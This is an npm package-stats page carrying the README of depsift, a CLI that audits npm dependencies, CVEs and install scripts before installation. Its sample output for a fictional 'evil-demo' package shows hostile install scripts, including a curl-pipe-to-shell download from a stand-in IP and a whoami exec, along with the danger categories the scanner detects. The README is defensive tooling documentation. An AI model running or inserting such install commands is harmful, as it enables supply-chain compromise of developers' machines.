npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

depsift

v0.6.0

Published

Should I install this? Audit any npm package — or your whole project — before you install: real (npm-accurate) dependency count, disk, maintainers you'd trust, stale deps, and the literal install scripts that run code on your machine.

Downloads

298

Readme

depsift

Should I install this? See what a single npm dependency really drags in — packages, disk, and the install scripts that run code on your machine — before you run npm install.

npx depsift express
  should i install express ?

  📦 68 packages added        (28 direct, you asked for 1)
  👤 38 maintainers you'd be trusting
  💾 2.0 MB on disk
  ✓  no install scripts
  🕰  oldest dep last shipped 11y ago — ee-first (26 stale, 2y+)
  ──────────────────────────────────────────────
  GRADE  B   "some deps haven't shipped in years — may be unmaintained."
  resolved like npm — highest version satisfying each range

You asked for 1 package. You got 68. That's the npm deal — and most of the time you never look. depsift makes you look, in two seconds, with no install.

Or audit your whole app at once — run it with no argument in any project:

npx depsift
  should i trust my-app's dependencies ?

  📦 266 packages in the tree        (3 direct deps) · 233 unique names
  👤 135 maintainers you'd be trusting
  💾 13 MB on disk
  ⚠  1 package runs code on your machine at install:
     node-sass
       postinstall: node scripts/build.js
  🪦 12 deprecated package(s)
  🕰  oldest dep last shipped 13y ago — async-foreach (208 stale, 2y+)
  ──────────────────────────────────────────────
  GRADE  D   "..."

That's your entire dependencies + devDependencies tree — every maintainer you trust and every install script that runs — in two seconds, no install.

npm, pnpm, bun, yarn

In project mode depsift reads your lockfile when one is present, so the audit reflects the exact versions you actually installed — not a fresh re-resolve. Auto-detected, in this order:

| Lockfile | Manager | | --- | --- | | pnpm-lock.yaml | pnpm (v5 / v6 / v9) | | bun.lock | bun (text lockfile) | | package-lock.json · npm-shrinkwrap.json | npm | | yarn.lock | yarn (classic & berry) |

No lockfile (or --no-lock) falls back to resolving package.json ranges the way npm would — highest version satisfying each range. Bun's binary bun.lockb can't be read without bun; depsift says so and audits your package.json ranges instead (run bun install --save-text-lockfile to get a readable bun.lock). The CLI itself has zero dependencies and runs under any of them — npx, pnpm dlx, bunx, yarn dlx.


Why

Every npm install is a trust decision you make blind:

  • You add 1 package, you trust 68 — and 38 maintainers you've never heard of. Each is code, and a person with publish rights, that ends up in your app.
  • Some run scripts on your machine the moment they install (postinstall, preinstall). That's the exact door supply-chain attacks walk through.
  • Some are deprecated or abandoneddepsift shows the oldest dep's last publish, so "last shipped 11 years ago" stops being a surprise after it's in your lockfile.

depsift answers all of that before you commit, straight from the npm registry. No install. No node_modules. No dependencies of its own.

Real CVEs — not guesses

depsift checks every resolved package against npm's own advisory database (the same data npm audit uses) and matches the exact vulnerable version ranges across the whole tree — transitive deps included. No Snyk account, no AI that might hallucinate a CVE, no token.

npx depsift [email protected]
  🛡  10 known vulnerabilities (1 critical, 4 high, 5 moderate)
     [critical] [email protected] Prototype Pollution in lodash
     [high]     [email protected] Command Injection in lodash
  ──────────────────────────────────────────────
  GRADE  F   "5 serious known vulnerabilities in the tree (1 critical, 4 high) — patch or avoid."

A critical CVE alone forces an F (exit 2), so it gates CI. Install a patched range and the card goes green.

The killer feature: it shows you the actual install script

Other tools tell you a package has an install script. depsift shows you the exact command that will run on your machine — and flags it if it reaches the network, pipes to a shell, evals, or reads your env.

A legit native build looks calm:

npx depsift node-sass
  ⚠  1 package runs code on your machine at install:
     node-sass
       install:     node scripts/install.js
       postinstall: node scripts/build.js

A package doing something it shouldn't lights up red:

  ⚠  2 packages run code on your machine at install:
     evil-demo 🚨 dynamic-exec, network, pipe-to-shell
       install:     node -e "require('child_process').exec('whoami')"
       postinstall: curl http://198.51.100.9/x.sh | sh
     helper
       postinstall: node build.js
  ────────────────────────────────────────
  GRADE  F   "an install script is flagged for dynamic-exec, network,
              pipe-to-shell — read the command above before you trust it."

npm install runs these before any of your own code — it's the exact door supply-chain attacks walk through. depsift reads the literal command straight from the registry (no install, no tarball download) and scans it for:

network · pipe-to-shell · dynamic-exec · obfuscation · reads-env · destructive/recon

So "I'll just install it" becomes a decision instead of a reflex.

Usage

npx depsift <package>      # audit one package before you add it
npx depsift react
npx depsift @scope/name
npx depsift [email protected]  # pin a version or range
npx depsift express@^5      # ranges work — resolved like npm

npx depsift                 # no arg → audit ./package.json's whole tree

No flags to learn. Run it, read the card, move on.

Exit codes (gate it in CI)

| code | meaning | | ---- | ------- | | 0 | grade A–D | | 2 | grade F — risky | | 1 | package not found / network error |

# fail a PR that tries to add a package graded F
npx depsift "$NEW_DEP" || exit 1

What the grade means

Starts at 100, loses points for:

  • known CVEs — critical −25, high −12, moderate −4, low −1 (from npm's advisory data, matched across the whole tree). A single critical forces F.
  • flagged install scripts (up to −40 each) — scaled by how many danger signals one command trips (network, pipe-to-shell, eval…). This is the only thing that can sink a package to F on its own — danger, not size.
  • install scripts (−5 each) — benign native builds are a mild nudge, not a death sentence
  • deprecated packages (−5 each)
  • stale packages (−2 each) — no publish in 2+ years
  • disk weight (up to −12) and dependency count (up to −15) — bloat is a nudge, not a verdict

Maintainer count and oldest-publish age are shown for context (they're the who and how-fresh of what you're trusting); they inform the quip but don't directly move the grade.

A install with confidence · B fine · C look closer · D heavy · F real risk — read the install script.

How it works

Hits the npm registry packument endpoint and walks the dependency graph in parallel — one request per unique package, covering deps, size, install scripts, maintainers, and publish dates in a single fetch. Every dependency range is resolved the way npm does — the highest published version that satisfies it — with its own zero-dependency semver matcher (cross-checked against node-semver for parity), and the tree is deduped by name@version, so the package count reflects what actually lands in node_modules. Nothing is installed and nothing touches disk.

Zero runtime dependencies. Node 18+.

Install (optional)

npx depsift <pkg> needs no install. If you want it on your PATH:

npm i -g depsift

How it compares

| | depsift | npq | should-install | howfat | | --- | :---: | :---: | :---: | :---: | | Real CVEs (npm advisories) | ✅ | via Snyk | AI-guessed | ❌ | | Shows the literal install-script command | ✅ | ❌ (warns only) | ❌ | ❌ | | Install-script danger scan (network/eval/…) | ✅ | ❌ | ❌ | ❌ | | npm-accurate dependency resolution | ✅ | n/a | n/a | ✅ | | Whole-project audit + letter grade | ✅ | ❌ | ✅ (AI) | ❌ | | Maintainers / staleness signals | ✅ | partial | ✅ | ❌ | | Runtime dependencies | 0 | 4 | 5 | 5 | | Needs an account / API key / AI CLI | no | Snyk optional | yes (AI) | no | | Deterministic (same answer every run) | ✅ | ✅ | ❌ | ✅ | | Changes your workflow | no (read-only) | yes (npq install) | no | no |

depsift is the only one that is zero-dependency, needs nothing installed, and shows you the exact command an install script will run — backed by real advisory data instead of an AI's best guess.

License

MIT